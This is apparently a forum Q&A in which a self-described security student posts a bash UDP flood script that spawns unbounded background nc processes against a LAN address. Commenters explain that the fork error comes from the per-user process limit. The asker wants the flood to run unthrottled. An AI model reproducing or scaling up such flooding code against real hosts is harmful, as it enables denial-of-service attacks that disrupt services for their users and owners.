# Background process limit : Fork unavailable

Tags: linux, shell, unix, background, fork

I'm trying to make my own DDoS tester (I'm learning network security at university), so I tried first to make this script

```
#!/bin/bash

ip="192.168.1.86"
port=80
msg="Hello from Client"

echo "Sending msg : '$msg' to $ip:$port"
while :
do
echo -n $msg | nc -4u $ip $port &
done
echo "Sent"
```

When i run it, i get an error after a while (in deed in a very short time (1s maybe), but after putting like 100 process in background) :

```
$ ./udp_flood.sh
Sending msg : 'Hello from Client' to 192.168.1.35:80
./udp_flood.sh: fork: Resource temporarily unavailable
```

I've already met this error in another project, so I now it's about the use of "&" and backgrounding stuff, but I can't find the reason of the thing.
I read about fork, about "&", and try to look for the error label on google, but I didn't find anything resolving this issue.

Thanks for help.

My machine : MacOSX 10.11.6 ; Langage used : Shell

Comment: This is likely a limit of the OS for your user, where you have a limit to the number of processes you can fork.  What does `ulimit -u` show you?  (It's to prevent forkbombing the system).  Note: this has nothing to do with whether the processes are in the foreground or background.

Comment: ulimit -u shows me 709 (i don't know how to include code in comments)
So what can I do to prevent this ?

Comment: So I made some research about ulimit, and i found "unlimit", it doesn't have a man page, but I tested it though. It doesn't output anything, but now when I ask "ulimit -u" I have 1064.

Comment: You can try raising your fork limit with `ulimit -u <number>` but your code WILL error out eventually because you're forking processes in an unbound loop.

Comment: Can I use another way to "multi-thread" my program ? Or do I have to find a way which doesn't use several process ?

Comment: You can do it this way, you just need a way to limit the number of processes you're creating/backgrounding.

Comment: But I don't want to limit it, I want it to continuously send as much as request my CPU/Wifi Card can handle and as fast as possible. Thanks for your answer, it didn't solved my problem but now i know why fork is insulting me. I'll do researches to find what I want. Thanks again

Comment: Your OS limits it to prevent you from taking down the machine.  If you are going to solve this via forking processes you will hit this limit.  Multithreading may help here, but you won't be able to do that within bash.